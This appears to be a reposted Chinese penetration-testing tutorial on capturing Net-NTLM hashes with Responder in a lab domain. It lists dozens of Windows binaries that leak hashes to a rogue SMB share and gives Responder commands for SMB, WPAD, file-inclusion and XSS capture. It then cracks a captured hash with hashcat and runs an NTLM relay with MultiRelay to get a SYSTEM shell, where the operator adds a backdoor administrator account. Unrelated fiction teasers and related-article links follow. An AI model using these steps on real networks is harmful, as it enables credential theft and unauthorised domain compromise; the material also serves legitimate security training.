內(nèi)網(wǎng)滲透之Responder與Net-NTML hash

原文鏈接:http://wyb0.com/posts/responder-and-ntml-hash/

0x00 一些概念

  • Windows認(rèn)證協(xié)議
    分為:基于NTML的認(rèn)證和基于kerberos的認(rèn)證

  • 什么是NTLM Hash宣蠕?
    早期IBM設(shè)計(jì)的LM Hash算法存在弱點(diǎn)终息,微軟在保持向后兼容性的同時(shí)提出了自己的挑戰(zhàn)響應(yīng)機(jī)制,即NTLM Hash

  • 什么是Challenge-Response挑戰(zhàn)/響應(yīng)驗(yàn)證機(jī)制晒骇?

    • Client輸入username霞怀、password与倡、domain距帅,然后將用戶名及密碼hash后存在本地抖仅,并將username發(fā)送到 DC
    • DC生成一個(gè)16字節(jié)的隨機(jī)數(shù)交煞,即Challenge(挑戰(zhàn)碼)咏窿,然后傳回Client
    • Client收到Challenge后將密碼hash和challenge混合hash,混合后的hash稱為response素征,然后將challenge集嵌、response和username發(fā)送給Server
    • Server將收到的3個(gè)值轉(zhuǎn)發(fā)給DC,然后DC根據(jù)傳過來的username到域控的賬號數(shù)據(jù)庫ntds.list找到對應(yīng)的密碼hash御毅,將hash和Client傳過來的challenge混合hash根欧,將這個(gè)混合hash與Client傳過來的response進(jìn)行對比驗(yàn)證
  • NTLM Hash與Net-NTLM Hash

    • NTLM Hash通常是指Windows系統(tǒng)下Security Account Manager中保存的用戶密碼hash,通扯饲可從Windows系統(tǒng)中的SAM文件和域控的NTDS.dit文件中獲得所有用戶的hash(比如用Mimikatz提确锎帧),“挑戰(zhàn)/響應(yīng)驗(yàn)證”中的用戶名及密碼hash就是NTLM Hash
    • Net-NTLM Hash通常是指網(wǎng)絡(luò)環(huán)境下NTLM認(rèn)證中的hash今豆,“挑戰(zhàn)/響應(yīng)驗(yàn)證”中的response中包含Net-NTLM hash嫌拣,用Responder抓取的就是Net-NTLM Hash
  • 關(guān)于Responder
    由Laurent Gaffie撰寫的 Responder 是迄今為止柔袁,在每個(gè)滲透測試人員用于竊取不同形式的證書(包括Net-NTLM hash)的最受歡迎的工具。它通過設(shè)置幾個(gè)模擬的惡意守護(hù)進(jìn)程(如SQL服務(wù)器异逐,F(xiàn)TP捶索,HTTP和SMB服務(wù)器等)來直接提示憑據(jù)或模擬質(zhì)詢 – 響應(yīng)驗(yàn)證過程并捕獲客戶端發(fā)送的必要 hash。Responder也有能力攻擊LLMNR灰瞻,NBT-NS和mDNS等協(xié)議腥例。

  • 什么是NTLM中繼攻擊?
    攻擊者可以直接通過LM Hash和NTLM Hash訪問遠(yuǎn)程主機(jī)或服務(wù)酝润,而不用提供明文密碼燎竖。

0x01 軟件環(huán)境

  • 可以從https://github.com/lgandx/Responder下載Responder
  • 域內(nèi)主機(jī):Win7(10.11.11.20)
  • 域控主機(jī):Win2008(10.11.11.18)
  • 被控主機(jī):Ubuntu14.04(10.11.11.11)和目標(biāo)機(jī)同一網(wǎng)段

0x02 通過SMB服務(wù)獲取Net-NTLM hash

對于SMB協(xié)議,客戶端在連接服務(wù)端時(shí)要销,默認(rèn)先使用本機(jī)的用戶名和密碼hash嘗試登錄底瓣,所以可以模擬SMB服務(wù)器從而截獲hash,執(zhí)行如下命令都可以得到hash

net.exe use \\host\share
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share #(noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share #(noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share #(this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share #(noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share #(noisy, pops an error dialog)
fvenotify.exe \\host\share #(noisy, pops an access denied error)
FXSCOVER.exe \\host\share #(noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share #(noisy, will pop an explorer window with the  contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share #(sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share #(noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share #(noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share #(noisy, invalid path to png error)
mspaint.exe \\host\share\share.png #(will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share #(noisy, error)
mstsc.exe \\host\share #(noisy, error)
netcfg.exe -l \\host\share -c p -i foo
  • 被控主機(jī)執(zhí)行:$ sudo python Responder.py -I eth0 -v


    image

0x03 通過文件包含獲取Net-NTLM hash

  • 被控主機(jī)執(zhí)行:$ sudo python Responder.py -I eth0 -v


    image

0x04 通過XSS獲取Net-NTLM hash

  • 被控主機(jī)執(zhí)行:$ sudo python Responder.py -I eth0 -v


    image

0x05 WPAD代理服務(wù)器抓取Net-NTLM hash

WPAD用于在windows中自動(dòng)化的設(shè)置ie瀏覽器的代理蕉陋,從Windows 2000開始該功能被默認(rèn)開啟捐凭。

開啟Responder的WPAD后,當(dāng)PC瀏覽網(wǎng)站時(shí)即可抓取到NTLM hash

加-F參數(shù)即可開啟WPAD抓取 hash凳鬓,而且當(dāng)主機(jī)重啟時(shí)也能抓到NTLM hash

  • 被控主機(jī)執(zhí)行:$ sudo python Responder.py -I eth0 -v -F


    image

    image

0x06 使用hashcat解密

$ git clone https://github.com/hashcat/hashcat.git
$ mkdir -p hashcat/deps
$ git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
$ cd hashcat
$ make
$ ./example0.sh
$ ./hashcat
  • 利用hashcat暴力猜解密碼
    -m:hash-type茁肠,5600對應(yīng)NetNTLMv2
    image

    得到密碼為123456
    image

0x07 通過NTLM中繼攻擊添加用戶

這里就用到了NTLM中繼攻擊,相當(dāng)于是中間人攻擊缩举,攻擊者獲取高權(quán)限的主機(jī)的hash垦梆,然后將hash轉(zhuǎn)發(fā)給低權(quán)限主機(jī)并執(zhí)行命令

這里就是抓取域控的hash,然后執(zhí)行命令得到域內(nèi)主機(jī)的信息

  • 修改Responder.conf仅孩,不啟動(dòng)SMB和HTTP托猩,然后啟動(dòng)Responder
reber@ubuntu:~/Responder$ head -n 14 Responder.conf
[Responder Core]

; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = Off
DNS = On
LDAP = On

#這里用的是-F,只要有高權(quán)限用戶通過瀏覽器訪問網(wǎng)頁就會(huì)中招辽慕,hash就會(huì)被抓取
reber@ubuntu:~/Responder$ sudo python Responder.py -I eth0 -v -F
  • 利用Responder的MultiRelay模塊獲取shell
reber@ubuntu:~/Responder/tools$ sudo python MultiRelay.py -t 10.11.11.20 -u ALL

Responder MultiRelay 2.0 NTLMv1/2 Relay

Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.

/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.

This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/

Relaying credentials for these users:
['ALL']


Retrieving information for 10.11.11.20...
SMB signing: False
Os version: 'Windows 7 Professional 7600'
Hostname: 'WIN-7'
Part of the 'REBER' domain
[+] Setting up HTTP relay with SMB challenge: f34fb4118e70e824
[+] Received NTLMv2 hash from: 10.11.11.18
[+] Client info: ['Windows Server 2008 R2 Enterprise 7600', domain: 'REBER', signing:'True']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate

Available commands:
dump               -> Extract the SAM database and print hashes.
regdump KEY        -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File  -> Read a file (eg: read /windows/win.ini)
get  Path_To_File  -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \windows\temp\
runas  Command     -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot  IP address  -> Connect to another host (eg: pivot 10.0.0.12)
mimi  command      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32  command    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd  command      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help               -> Print this message.
exit               -> Exit this shell and return in relay mode.
                      If you want to quit type exit and then use CTRL-C

Any other command than that will be run as SYSTEM on the target.

Connected to 10.11.11.20 as LocalSystem.
C:\Windows\system32\:#net user test 123456 /add && net localgroup administrators test /add
????????ɡ?


C:\Windows\system32\:#net user

\\ ????????

-------------------------------------------------------------------------------
Administrator            Guest                    reber
test
???????????????????????????


C:\Windows\system32\:#exit
[+] Returning in relay mode.
Exiting...
reber@ubuntu:~/Responder/tools$


Reference(侵刪):

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末京腥,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子溅蛉,更是在濱河造成了極大的恐慌公浪,老刑警劉巖,帶你破解...
    沈念sama閱讀 210,914評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件船侧,死亡現(xiàn)場離奇詭異欠气,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)镜撩,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,935評論 2 383
  • 文/潘曉璐 我一進(jìn)店門预柒,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事宜鸯∪俗疲” “怎么了?”我有些...
    開封第一講書人閱讀 156,531評論 0 345
  • 文/不壞的土叔 我叫張陵顾翼,是天一觀的道長投放。 經(jīng)常有香客問我,道長适贸,這世上最難降的妖魔是什么灸芳? 我笑而不...
    開封第一講書人閱讀 56,309評論 1 282
  • 正文 為了忘掉前任,我火速辦了婚禮拜姿,結(jié)果婚禮上烙样,老公的妹妹穿的比我還像新娘。我一直安慰自己蕊肥,他們只是感情好谒获,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,381評論 5 384
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著壁却,像睡著了一般批狱。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上展东,一...
    開封第一講書人閱讀 49,730評論 1 289
  • 那天赔硫,我揣著相機(jī)與錄音,去河邊找鬼盐肃。 笑死爪膊,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的砸王。 我是一名探鬼主播推盛,決...
    沈念sama閱讀 38,882評論 3 404
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼谦铃!你這毒婦竟也來了耘成?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,643評論 0 266
  • 序言:老撾萬榮一對情侶失蹤荷辕,失蹤者是張志新(化名)和其女友劉穎凿跳,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體疮方,經(jīng)...
    沈念sama閱讀 44,095評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,448評論 2 325
  • 正文 我和宋清朗相戀三年茧彤,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了骡显。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,566評論 1 339
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖惫谤,靈堂內(nèi)的尸體忽然破棺而出壁顶,到底是詐尸還是另有隱情,我是刑警寧澤溜歪,帶...
    沈念sama閱讀 34,253評論 4 328
  • 正文 年R本政府宣布若专,位于F島的核電站,受9級特大地震影響蝴猪,放射性物質(zhì)發(fā)生泄漏调衰。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,829評論 3 312
  • 文/蒙蒙 一自阱、第九天 我趴在偏房一處隱蔽的房頂上張望嚎莉。 院中可真熱鬧,春花似錦沛豌、人聲如沸趋箩。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,715評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽叫确。三九已至,卻和暖如春芍锦,著一層夾襖步出監(jiān)牢的瞬間启妹,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,945評論 1 264
  • 我被黑心中介騙來泰國打工醉旦, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留饶米,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,248評論 2 360
  • 正文 我出身青樓车胡,卻偏偏與公主長得像檬输,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子匈棘,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,440評論 2 348

推薦閱讀更多精彩內(nèi)容

  • 部分內(nèi)容轉(zhuǎn)載自搜狗百科 cmd是command的縮寫.即命令提示符(CMD)丧慈,是在OS / 2 , Windows...
    青冥之上閱讀 2,388評論 0 24
  • 命令簡介 cmd是command的縮寫.即命令行 主卫。 雖然隨著計(jì)算機(jī)產(chǎn)業(yè)的發(fā)展逃默,Windows 操作系統(tǒng)的應(yīng)用越來...
    ___大魚___閱讀 1,113評論 1 5
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,150評論 0 11
  • 運(yùn)行操作 CMD命令:開始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小明yz閱讀 2,752評論 0 8
  • 一簇搅、命令行 1. calc-----------啟動(dòng)計(jì)算器 2.certmgr.msc----證書管理實(shí)用程序 3...
    小小辛_c閱讀 701評論 0 2